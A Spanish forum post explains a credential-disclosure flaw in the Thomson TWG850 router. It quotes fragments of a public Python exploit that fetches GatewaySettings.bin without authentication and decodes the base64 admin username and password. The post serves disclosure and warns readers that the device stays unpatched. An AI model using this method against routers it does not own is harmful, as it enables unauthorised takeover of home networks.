Obtener los credenciales de administrador de un Thomson TWG850 (Pagina 1) / Otras marcas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 05-09-2015 10:19:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,684

Obtener los credenciales de administrador de un Thomson TWG850

Obtener los credenciales de administrador de un Thomson TXG850

Thom1.jpg

  Esto no es una lavadora: es un router.
Un router un  "poco" anticuado con un diseño muy "Thomson" (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces? tongue
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el "exploit" en este tema de packet storm :

Lo que ocurre es que los credenciales están

  1. en un fichero accesible  sin conocer la contraseña root

  2. cifrados en base 64 y es una función de hash reversible

1. Se pasa por CatewaySettings.bin : vemos la variable "bifi" definida aquí

bifi  = 'GatewaySettings.bin'

Par ser empleada en la petición

req = urllib2.Request('%s/%s'%(router,bifi))

2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle "for"

for s in hr_data(bifi):
            try:
                dec = base64.decodestring(s)

Y luego se pillan  los datos con el "bucle if"
               

 if dec.find(':') != -1:
                    user,passwd = dec.split(':')
                    print '(+)- User: %s%s%s'%(G_C,user,D_C)
                    print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
                     
                    print '(+)- Checking if creds are OK...'
                    checkcreds(router,user,passwd)

No hay  remedio y no habrán actualizaciones para este router.   
No es aconsejable usarlo como router para su red domestica.

Los créditos para este full disclosure van a  Glaysson dos Santos
  Fuente:

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Pegado:
91 6643 Hoy 11:05:19 por kiabras
25 275 Hoy 09:33:18 por thuglife
4 66 Ayer 21:02:13 por trini
0 36 Ayer 20:14:04 por kcdtv
El porque por dynyly  [ 1 2 ]
25 194 25-04-2017 15:05:04 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Pikitui
Usuarios registrados conectados: 1
Invitados conectados: 10

Conectados: Koala

Estadisticas de los foros

Número total de usuarios registrados: 474
Número total de temas: 757
Número total de mensajes: 5,893

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22